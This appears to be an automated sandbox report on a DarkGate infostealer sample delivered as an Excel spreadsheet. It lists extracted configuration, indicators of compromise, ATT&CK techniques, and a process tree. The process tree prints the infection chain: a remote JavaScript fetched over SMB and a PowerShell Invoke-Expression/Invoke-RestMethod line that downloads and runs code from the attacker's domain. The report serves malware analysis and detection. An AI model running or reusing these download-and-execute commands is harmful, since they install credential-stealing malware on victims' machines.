darkgate | 378b000edf3bfe114e1b7ba8045371080a256825f25faaea364cf57fa6d898d7

Resubmissions

10-04-2024 19:35

240410-yavszscf9x 1

10-04-2024 18:24

240410-w1999aba2w 10

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
10-04-2024 18:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4_10_AC-2335.xlsx
Size

51KB
MD5

7efe9f3902618e160caafb1f6fd73dd6
SHA1

8f1a3560307e848a01122d088d9136e545726ca8
SHA256

378b000edf3bfe114e1b7ba8045371080a256825f25faaea364cf57fa6d898d7
SHA512

5392ebb12b0fa8225eb532db284bd6e38b23737615471f8bd7e7482b787520eaf3e4937039be2d4ea48e3fb93b787cfecdcd1c1a1b91066bed4a995c5eff72bf
SSDEEP

1536:4s1eZDHgM8v42wkYq84lKL7IAnA4xCQH140Xz:V1eZcMetF8T7IAA4xprD

Score

10^/10

darkgate admin888 stealer

Malware Config

Extracted

Family

darkgate

Botnet

admin888

wassonite.com

Attributes

anti_analysis
true
anti_debug
false
anti_vm
true
c2_port
80
check_disk
false
check_ram
false
check_xeon
false
crypter_au3
false
crypter_dll
false
crypter_raw_stub
false
internal_mutex
jdfEdKYT
minimum_disk
50
minimum_ram
4000
ping_interval
6
rootkit
false
startup_persistence
true
username
admin888

Signatures

DarkGate
DarkGate is an infostealer written in C++.
stealer darkgate

Detect DarkGate stealer 4 IoCs

resource	yara_rule
behavioral2/memory/4828-74-0x0000000004AA0000-0x0000000004B14000-memory.dmp	family_darkgate_v6
behavioral2/memory/4828-76-0x0000000004AA0000-0x0000000004B14000-memory.dmp	family_darkgate_v6
behavioral2/memory/744-113-0x0000000004670000-0x00000000046E4000-memory.dmp	family_darkgate_v6
behavioral2/memory/744-115-0x0000000004670000-0x00000000046E4000-memory.dmp	family_darkgate_v6

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	968	2684	WScript.exe	84
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2168	2684	WScript.exe	84
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	5012	2684	WScript.exe	84

Blocklisted process makes network request 12 IoCs

flow	pid	Process
50	1756	powershell.exe
53	1756	powershell.exe
56	1756	powershell.exe
57	1756	powershell.exe
59	2136	powershell.exe
60	2136	powershell.exe
61	2136	powershell.exe
62	2136	powershell.exe
68	840	powershell.exe
69	840	powershell.exe
73	840	powershell.exe
74	840	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 2 IoCs

pid	Process
4828	AutoHotkey.exe
744	AutoHotkey.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AutoHotkey.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AutoHotkey.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AutoHotkey.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AutoHotkey.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2684	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
1756	powershell.exe
1756	powershell.exe
4828	AutoHotkey.exe
4828	AutoHotkey.exe
2136	powershell.exe
2136	powershell.exe
744	AutoHotkey.exe
744	AutoHotkey.exe
840	powershell.exe
840	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1756	powershell.exe
Token: SeDebugPrivilege	2136	powershell.exe
Token: SeDebugPrivilege	840	powershell.exe

Suspicious use of SetWindowsHookEx 16 IoCs

pid	Process
2684	EXCEL.EXE
2684	EXCEL.EXE
2684	EXCEL.EXE
2684	EXCEL.EXE
2684	EXCEL.EXE
2684	EXCEL.EXE
2684	EXCEL.EXE
2684	EXCEL.EXE
2684	EXCEL.EXE
2684	EXCEL.EXE
2684	EXCEL.EXE
2684	EXCEL.EXE
2684	EXCEL.EXE
2684	EXCEL.EXE
2684	EXCEL.EXE
2684	EXCEL.EXE

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 2684 wrote to memory of 968	2684	EXCEL.EXE	96
PID 2684 wrote to memory of 968	2684	EXCEL.EXE	96
PID 968 wrote to memory of 1756	968	WScript.exe	97
PID 968 wrote to memory of 1756	968	WScript.exe	97
PID 1756 wrote to memory of 4828	1756	powershell.exe	99
PID 1756 wrote to memory of 4828	1756	powershell.exe	99
PID 1756 wrote to memory of 4828	1756	powershell.exe	99
PID 1756 wrote to memory of 4056	1756	powershell.exe	100
PID 1756 wrote to memory of 4056	1756	powershell.exe	100
PID 2684 wrote to memory of 2168	2684	EXCEL.EXE	101
PID 2684 wrote to memory of 2168	2684	EXCEL.EXE	101
PID 2168 wrote to memory of 2136	2168	WScript.exe	102
PID 2168 wrote to memory of 2136	2168	WScript.exe	102
PID 2136 wrote to memory of 744	2136	powershell.exe	104
PID 2136 wrote to memory of 744	2136	powershell.exe	104
PID 2136 wrote to memory of 744	2136	powershell.exe	104
PID 2136 wrote to memory of 4980	2136	powershell.exe	105
PID 2136 wrote to memory of 4980	2136	powershell.exe	105
PID 2684 wrote to memory of 5012	2684	EXCEL.EXE	106
PID 2684 wrote to memory of 5012	2684	EXCEL.EXE	106
PID 5012 wrote to memory of 840	5012	WScript.exe	107
PID 5012 wrote to memory of 840	5012	WScript.exe	107

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4056	attrib.exe
4980	attrib.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\4_10_AC-2335.xlsx"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2684
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "\\5.180.24.155\azure\EXCEL_DOCUMENT_OPEN.JS"
  2⤵
  - Process spawned unexpected child process
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:968
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri wassonite.com/yrqnsfla)
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1756
  - - C:\ciie\AutoHotkey.exe
      "C:\ciie\AutoHotkey.exe" C:/ciie/script.ahk
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:4828
  - - C:\Windows\system32\attrib.exe
      "C:\Windows\system32\attrib.exe" +h C:/ciie/
      4⤵
      Views/modifies file attributes
      PID:4056
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "\\5.180.24.155\azure\EXCEL_DOCUMENT_OPEN.JS"
  2⤵
  - Process spawned unexpected child process
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2168
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri wassonite.com/yrqnsfla)
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2136
  - - C:\ciie\AutoHotkey.exe
      "C:\ciie\AutoHotkey.exe" C:/ciie/script.ahk
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:744
  - - C:\Windows\system32\attrib.exe
      "C:\Windows\system32\attrib.exe" +h C:/ciie/
      4⤵
      Views/modifies file attributes
      PID:4980
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "\\5.180.24.155\azure\EXCEL_DOCUMENT_OPEN.JS"
  2⤵
  - Process spawned unexpected child process
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:5012
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri wassonite.com/yrqnsfla)
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:840

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
56c43715e0e7fa58012d8a5769d8d568

SHA1
4370ca3436f2e3a95b47a728503a2c22a5a5fa39

SHA256
8ef51b68725d9ddcda70f9f7ef24686ff3cb4a00f7d2dce79d10027ed63dfed5

SHA512
b8da8defb2080d04babc3e676cc9686c7f71b15eeca0e738ca75c9fb7af968eba8d3daff5bc2e31d471e26568df2f319ec1f4b00bf43ffb60460e5df787947ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f43c597743e840d78e4abe58e78598ca

SHA1
d0a35d03e4029a8474f9a43eaef80464678e086c

SHA256
ecab2aceb885ac737162c2e54e8bde677d9fd31d3c31cae9358d31f7c13c7933

SHA512
f9f8b22225d0772082b7b694f0e26b99a32578ee33d7396146d2da8a072b35883dce32681193a8fd366288ca4ef6d21cc8d48afded630480d104d26c529eb8f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
17e629ba805faebf22028cb27ce5d38c

SHA1
722f52158d6874391803fbe2d018de37bc11bce4

SHA256
f7e97b3fae3386eb4fe66c4280cfca9d4255fb256d59716dd90e8ad7ab82e057

SHA512
973fa87f210b62f25f2e755f25d48e8fb04beca9e8d20a5c53a4ec204e2ca04bb881b88f6f5537a765bb3c4a303ac8ffa9be3f7b230a85d9df1168d9b40f842f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fv54bqks.kf2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\deeCede

Filesize
32B

MD5
dd745c952aa455d3d56c5b5aeae66a4c

SHA1
5b143efab43b847d3fa300dbd93379c7a6c02042

SHA256
d606db08d66352fa685088e313f26e99482f15123a1842142705be16dd3e34a8

SHA512
4c1dedaa104f30e30246753236b8b1485e433f356dcf70c6834fe1e51a274d4b92654f4f44c8ed66fffe5379a4b4e0df884f7a9a3ccc34c3f4b99accd22528f6

Download Submit
C:\ciie\AutoHotkey.exe

Filesize
892KB

MD5
a59a2d3e5dda7aca6ec879263aa42fd3

SHA1
312d496ec90eb30d5319307d47bfef602b6b8c6c

SHA256
897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb

SHA512
852972ca4d7f9141ea56d3498388c61610492d36ea7d7af1b36d192d7e04dd6d9bc5830e0dcb0a5f8f55350d4d8aaac2869477686b03f998affbac6321a22030

Download Submit
C:\ciie\script.ahk

Filesize
441B

MD5
a2f4ba569825d00dbbb62fd64104e0e3

SHA1
45687aac5b0031d2063c466fa3fee6f813e92441

SHA256
8fca9dd75bac6406d6acd04ad98ee58c31e112fc3352199ebdc45f0347601791

SHA512
5a7825f6d47a7f5f7c198a2b34a8bd08a422b22753239b8ec6307d6e22c8c544ae54765f9954706f3e99976c28ad6085d78d88c92a650ce86e88f9751c486cc3

Download Submit
C:\ciie\test.txt

Filesize
924KB

MD5
dcb6148e6a4d5c89ab44a23b4edebeeb

SHA1
542839b03a18f57efe10dc318d8947a31a3ee61a

SHA256
0e64aabd9ea8afb2f01925c2eb06bf2bb57d1b09e7971e653a7256c56775a634

SHA512
ac7359c8b85eeb86ae742c2e8ad2788314248dd26b5f37889ea9660282538716db7fca96b48a287b087c0ca669c1c0e8ce6b19278268a53eddd99dc1b24ac85d

Download Submit
memory/744-115-0x0000000004670000-0x00000000046E4000-memory.dmp

Filesize
464KB

Download
memory/744-113-0x0000000004670000-0x00000000046E4000-memory.dmp

Filesize
464KB

Download
memory/840-121-0x00007FF806AB0000-0x00007FF807571000-memory.dmp

Filesize
10.8MB

Download
memory/1756-72-0x00007FF806AB0000-0x00007FF807571000-memory.dmp

Filesize
10.8MB

Download
memory/1756-38-0x00000128312E0000-0x0000012831302000-memory.dmp

Filesize
136KB

Download
memory/1756-51-0x00000128319D0000-0x0000012831B92000-memory.dmp

Filesize
1.8MB

Download
memory/1756-50-0x0000012831440000-0x0000012831450000-memory.dmp

Filesize
64KB

Download
memory/1756-49-0x0000012831440000-0x0000012831450000-memory.dmp

Filesize
64KB

Download
memory/1756-48-0x00007FF806AB0000-0x00007FF807571000-memory.dmp

Filesize
10.8MB

Download
memory/2136-79-0x00000250650A0000-0x00000250650B0000-memory.dmp

Filesize
64KB

Download
memory/2136-78-0x00007FF806AB0000-0x00007FF807571000-memory.dmp

Filesize
10.8MB

Download
memory/2136-80-0x00000250650A0000-0x00000250650B0000-memory.dmp

Filesize
64KB

Download
memory/2136-111-0x00007FF806AB0000-0x00007FF807571000-memory.dmp

Filesize
10.8MB

Download
memory/2684-36-0x00007FF82F830000-0x00007FF82FA25000-memory.dmp

Filesize
2.0MB

Download
memory/2684-8-0x00007FF82F830000-0x00007FF82FA25000-memory.dmp

Filesize
2.0MB

Download
memory/2684-2-0x00007FF7EF8B0000-0x00007FF7EF8C0000-memory.dmp

Filesize
64KB

Download
memory/2684-18-0x00007FF82F830000-0x00007FF82FA25000-memory.dmp

Filesize
2.0MB

Download
memory/2684-22-0x00007FF82F830000-0x00007FF82FA25000-memory.dmp

Filesize
2.0MB

Download
memory/2684-21-0x00007FF82F830000-0x00007FF82FA25000-memory.dmp

Filesize
2.0MB

Download
memory/2684-20-0x00007FF82F830000-0x00007FF82FA25000-memory.dmp

Filesize
2.0MB

Download
memory/2684-19-0x00007FF82F830000-0x00007FF82FA25000-memory.dmp

Filesize
2.0MB

Download
memory/2684-17-0x00007FF82F830000-0x00007FF82FA25000-memory.dmp

Filesize
2.0MB

Download
memory/2684-16-0x00007FF82F830000-0x00007FF82FA25000-memory.dmp

Filesize
2.0MB

Download
memory/2684-15-0x00007FF82F830000-0x00007FF82FA25000-memory.dmp

Filesize
2.0MB

Download
memory/2684-14-0x00007FF82F830000-0x00007FF82FA25000-memory.dmp

Filesize
2.0MB

Download
memory/2684-13-0x00007FF7ED800000-0x00007FF7ED810000-memory.dmp

Filesize
64KB

Download
memory/2684-4-0x00007FF7EF8B0000-0x00007FF7EF8C0000-memory.dmp

Filesize
64KB

Download
memory/2684-3-0x00007FF7EF8B0000-0x00007FF7EF8C0000-memory.dmp

Filesize
64KB

Download
memory/2684-11-0x00007FF82F830000-0x00007FF82FA25000-memory.dmp

Filesize
2.0MB

Download
memory/2684-10-0x00007FF82F830000-0x00007FF82FA25000-memory.dmp

Filesize
2.0MB

Download
memory/2684-12-0x00007FF82F830000-0x00007FF82FA25000-memory.dmp

Filesize
2.0MB

Download
memory/2684-9-0x00007FF82F830000-0x00007FF82FA25000-memory.dmp

Filesize
2.0MB

Download
memory/2684-23-0x00007FF82F830000-0x00007FF82FA25000-memory.dmp

Filesize
2.0MB

Download
memory/2684-6-0x00007FF7ED800000-0x00007FF7ED810000-memory.dmp

Filesize
64KB

Download
memory/2684-7-0x00007FF82F830000-0x00007FF82FA25000-memory.dmp

Filesize
2.0MB

Download
memory/2684-5-0x00007FF82F830000-0x00007FF82FA25000-memory.dmp

Filesize
2.0MB

Download
memory/2684-0-0x00007FF7EF8B0000-0x00007FF7EF8C0000-memory.dmp

Filesize
64KB

Download
memory/2684-1-0x00007FF7EF8B0000-0x00007FF7EF8C0000-memory.dmp

Filesize
64KB

Download
memory/4828-76-0x0000000004AA0000-0x0000000004B14000-memory.dmp

Filesize
464KB

Download
memory/4828-74-0x0000000004AA0000-0x0000000004B14000-memory.dmp

Filesize
464KB

Download